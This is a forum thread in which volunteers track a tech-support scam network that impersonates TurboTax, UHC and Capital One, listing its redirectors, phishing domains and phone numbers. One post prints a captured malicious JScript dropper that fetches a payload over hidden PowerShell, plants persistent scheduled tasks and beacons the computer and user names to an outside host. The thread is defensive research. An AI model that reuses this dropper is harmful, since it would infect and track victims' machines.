Now some news: the redirector has changed its target to https://activation.begin.rest/turbotax/
I reported this multi-scam website here:
suspecting that it was a Web InfoTech property. Now there is more evidence.
إعجاب واحد (1)
Another thing, kind of a puzzle:
A bunch of this scam group’s impersonation web sites share this “DG” logo
as a favicon and/or elsewhere. It never seems related to the supposed topic of the website (Turbotax, HBO Max, Fidelity investments…)
What does DG stand for? Is it a clue?
إعجاب واحد (1)
Guess what? This same number is also the “support” number for the Microsoft mobile phone linking scheme
Phishing page https://akas.prinset.shop/
inevitably leads to the fake error page Phone Link
Associated tawk.to account https://tawk.to/chat/65182c27e6bed319d0048030/1hbj6oupp
These scammers are hungry – put your phone number in the form on the phishing page and Peter Mam or one of his fellow Support Executives will call you right away on a Saturday. I got a call from Peter Mam on 856-212-1306.
إعجابَين (2)
I submitted the phishing page. Sunday.
إعجابَين (2)
Here’s what I think is another piece of their Internet infrastructure.
Take for example this fake TurboTax page https://installtaxturbo.com/install-turbotax-with-license-code/
It links to the site Download & Install TurboTax® Desktop 2024-2025 which I’ve noted as a suspected Web Infotech property in a couple other threads, via a redirecting domain, “ww0.us.”
see Fake HP Printer scammer websites - #10 by ElmerFudde2020 for another example.
Now, for the redirection to work, a http parameter has to be passed to ww0.us (after the “?” in the URL). The usual parameters I’ve seen seem to be base64-encoded URLs.
However, what about a sort of default or dummy parameter? Is there a default or fallback response?
What if we tried https://ww0.us/?I_AM_A_SCAMMER ?
Guess where it redirects to?
3 إعجابات
More on ww0.us: Currently Whois records say the domain is administered by a “Roger Watts” at a very modest residential address in New Jersey (I’m not going to post the exact address because there’s a good chance it’s fake and whoever lives there has nothing to do with this).
Registered admin email [email protected] is also the admin for two obvious phishing domains, both registered in January of this year
https://activateuhccom.us/ and https://activateuhc.us/ , both pretending to be United Healthcare, and both of which are probably more scammy than the real UHC which is hard to beat.
The link on the second address uses the ww0.us redirector/obfuscator!
aHR0cHM6Ly9hY3RpdmF0ZXVoYy51cw== is just the originating URL, https://activateuhc.us , in base64.
It redirects to, where else?, a subdirectory of activation.begin.support – setup your activate.uhc.com (it will return a dummy page unless you access it through the phishing redirector link).
and of course there’s an error, why not! setup your activate.uhc.com
New toll-free number: 855-222-8365. I get the standard “blacklisted” message that I get from Web Infotech numbers when I call from my main research phone.
But wait, there’s more. Up until December 26 of last year, ww0.us was owned by a Salman Khan of Rajasthan, email [email protected] (cool email address Salman!) The other domain registered to that address is a very suspicious https://youtube.gs/
*Note: Salman Khan is the name of a famous Bollywood actor, probably not the same guy! And quite likely not even a real name for one of our scammers, just a little joke from them.
3 إعجابات
i think the link is changed now!
4 إعجابات
New website: tx.newredir.com now redirects to Download & Install TurboTax® Desktop 2024-2025 .
So over the course of the month this multi-scam website has moved from activation.begin.rest to activation.begin.support to activation.begin.lat.
5 إعجابات
If your browser user-agent is set to Chrome on Android, tx.newredir.com once again redirects to https://ts.activatetax.pro/Installation-Error-Contact-Support.php . Probably works for some other browser user agent combos. New toll-free phone number: 855-531-2626.
3 إعجابات
Via a google search I found another subdirectory of this multi-scam site. This one doesn’t seem to check for referrer, user-agent or http parameters
إعجابَين (2)
A new domain I discovered today
The Google Sites page Activate my Capital One card online at Activate.capitalone.com links to
If the browser user agent is a mobile phone variety, it redirects to
https://activation-support.tax-com.com/capitalone/enter-code.php
with the error page https://activation-support.tax-com.com/capitalone/authentication-error.php
new toll-free number: 866-593-3778.
Here’s a spam post that’s a catalogue of related phishing sites, including other subdomains of tax-com.com:
(copy archived at web.archive.org installturbotax | Players list | Bandori Party - BanG Dream! Girls Band Party )
إعجابَين (2)
And today this page has another new toll-free number: 855-613-0464.
إعجابَين (2)
New toll-free number spotted today: 855-668-8507.
3 إعجابات
New website and new phone number. The redirect yields the scamming page for Safari/iOS (but oddly, not Chrome/Android).
https://activation-support.tellmenew.com/capitalone/authentication-error.php
855-619-8688
3 إعجابات
866-217-2243 is active again at https://myefiling.online//Installation-Error-Contact-Support.php .
Update later the same day: a new toll free number, 855-923-3385.
In other news, the old redirecting site tx.newredir.com seems to have finally gone down (for now?) and all their thousands of SEO spam feeder pages are being updated with a new intermediate domain, ts.remdos.com. E.g. Installturbotax.com . Registrar is AppCroNix Infotech Private Limited, d/b/a VEBONIX.com, registered just five days ago.
إعجابَين (2)
Update on this: with my browser user agent set to MS Edge on Windows, activateuhc.us directs me via ww0.us to a new phishing domain, setup your activate.uhc.com . After entering my (fake) info, the form sends me to this page:
Which prompts me to download and install a zip-compressed EXE file and run it! Wow that can’t be good. Anyone want to do some analysis on the file?
The parent domain freetechsupport.org returns a bare-bones “tech support” website with a phone number: 856-240-0005.
Google says 856-240-0005 is also the number for:
- Book Flights Easily with Flights on Deals | Flights on Deals
- fixaprinter - Contect Us
- Contact Dazzling India for Luxurious Travel Experiences | Dazzling India
- Contact us
- Cricut Design Space
- Contact Us - canonoobe.com
- Windows 12 IO - Your Ultimate Guide to Windows 12
- https://www.printer.com.co/
- https://www.roku.cam/
إعجاب واحد (1)
So the “EXE” file is not actually a binary file but some kind of Powershell thing that downloads from various URLs – still very malicious!
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var localAppData = shell.ExpandEnvironmentStrings("%LOCALAPPDATA%");
var updateBatPath = localAppData + "\\update.bat";
var backupBatPath = localAppData + "\\backup.bat";
var updateBatContent = "@echo off\n";
updateBatContent += "start /min cmd /c PowerShell.exe -WindowStyle Hidden -Command \"Invoke-WebRequest -Uri 'http://dr5.org/in.mp3' -OutFile '" + backupBatPath + "'\"\n";
var updateBatFile = fso.CreateTextFile(updateBatPath, true);
updateBatFile.Write(updateBatContent);
updateBatFile.Close();
function createScheduledTask(taskName, taskTime, taskPath) {
var command = 'SCHTASKS /Create /SC DAILY /TN "' + taskName + '" /TR "' + taskPath + '" /ST ' + taskTime + ' /RU "' + shell.ExpandEnvironmentStrings("%USERNAME%") + '" /F';
shell.Run("cmd /c echo N | " + command, 0, true);
}
createScheduledTask("MyTasks\\1", "11:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\2", "11:06", '"' + backupBatPath + '"');
createScheduledTask("MyTasks\\3", "19:05", '"' + updateBatPath + '"');
createScheduledTask("MyTasks\\4", "19:06", '"' + backupBatPath + '"');
var computerName = shell.ExpandEnvironmentStrings("%COMPUTERNAME%");
var userName = shell.ExpandEnvironmentStrings("%USERNAME%");
var url = "http://l77.org/downloading.php?dl=uhc&id=" + computerName + "_" + userName;
shell.Run("cmd /c start /min " + url, 0, false);
إعجاب واحد (1)
So, if you query this URL using a Windows Powershell user-agent string, you get something that isn’t an MP3 file (maybe the extension is to deceive firewalls or antivirus heuristics?) but a Windows shell script. I’m not good at analyzing this but it involves scheduling a bunch of recurring background tasks, and something named Antivirus-Update.bat. Any experts out there who can help decoding this?
I’m trying to paste the code into this comment but I’m getting a “403 error,” maybe it’s too long or something?
Update: I put the file through hybrid-analysis.com and it says it’s the “Trojan.Script.Agent.khixek” aka the AdsExhaust trojan, which supposedly generates fake clicks on pay-per-click ads or something like that?
إعجاب واحد (1)
ts.remdos.com is still going, but a new intermediate redirector domain has been added to the multiple-step path of redirection: taxredir.online, registered on 19 March 2025.
And a new toll-free fake Turbotax number: 855-984-0698.
Update 5 April 2025: New toll-free fake TurboTax: 855-984-0972.
3 إعجابات
Vonage number (786) 946-2540
إعجاب واحد (1)